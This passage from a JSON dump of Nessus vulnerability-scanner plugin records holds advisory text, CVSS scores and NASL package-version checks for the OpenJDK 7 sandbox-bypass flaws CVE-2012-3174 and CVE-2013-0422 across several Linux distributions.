script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T02:47:11", "description": "Two improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. 
(CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\n\nAll running instances of OpenJDK Java must be restarted for the update\nto take effect.", "edition": 13, "published": "2013-01-17T00:00:00", "title": "Scientific Linux Security Update : java-1.7.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130116)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-src", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-devel", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-javadoc", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-debuginfo"], "id": "SL_20130116_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/63607", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63607);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n\n script_name(english:\"Scientific Linux Security Update : java-1.7.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130116)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. 
(CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\n\nAll running instances of OpenJDK Java must be restarted for the update\nto take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1301&L=scientific-linux-errata&T=0&P=700\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?208272cf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", 
value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n}\n", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:06", "description": "It was discovered that OpenJDK 7's security mechanism could be\nbypassed via Java applets. If a user were tricked into opening a\nmalicious website, a remote attacker could exploit this to perform\narbitrary code execution as the user invoking the program.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-01-17T00:00:00", "title": "Ubuntu 12.10 : openjdk-7 vulnerabilities (USN-1693-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-zero", "p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-jamvm", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-headless", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-cacao", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-lib"], "id": "UBUNTU_USN-1693-1.NASL", "href": "https://www.tenable.com/plugins/nessus/63609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1693-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63609);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"USN\", value:\"1693-1\");\n\n script_name(english:\"Ubuntu 12.10 : openjdk-7 vulnerabilities (USN-1693-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that OpenJDK 7's security mechanism could be\nbypassed via Java applets. If a user were tricked into opening a\nmalicious website, a remote attacker could exploit this to perform\narbitrary code execution as the user invoking the program.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1693-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-cacao\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-jamvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-cacao\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-jamvm\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-headless\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-lib\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-zero\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-7-jre-cacao / icedtea-7-jre-jamvm / openjdk-7-jre / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:19", "description": "Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 24, "published": "2013-01-17T00:00:00", "title": "CentOS 5 / 6 : java-1.7.0-openjdk (CESA-2013:0165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-devel", "p-cpe:/a:centos:centos:java-1.7.0-openjdk", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-demo", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-src", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-javadoc"], "id": "CENTOS_RHSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/63581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0165 and \n# CentOS Errata and Security Advisory 2013:0165 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63581);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n\n script_name(english:\"CentOS 5 / 6 : java-1.7.0-openjdk (CESA-2013:0165)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. 
All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8227c40e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-January/019204.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?051e9c91\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-3174\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T09:14:30", "description": "Updated java-1.7.0-openjdk packages that fix two security issues are\nnow 
available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 23, "published": "2013-01-17T00:00:00", "title": "RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6.3", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc"], "id": "REDHAT-RHSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/63590", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 
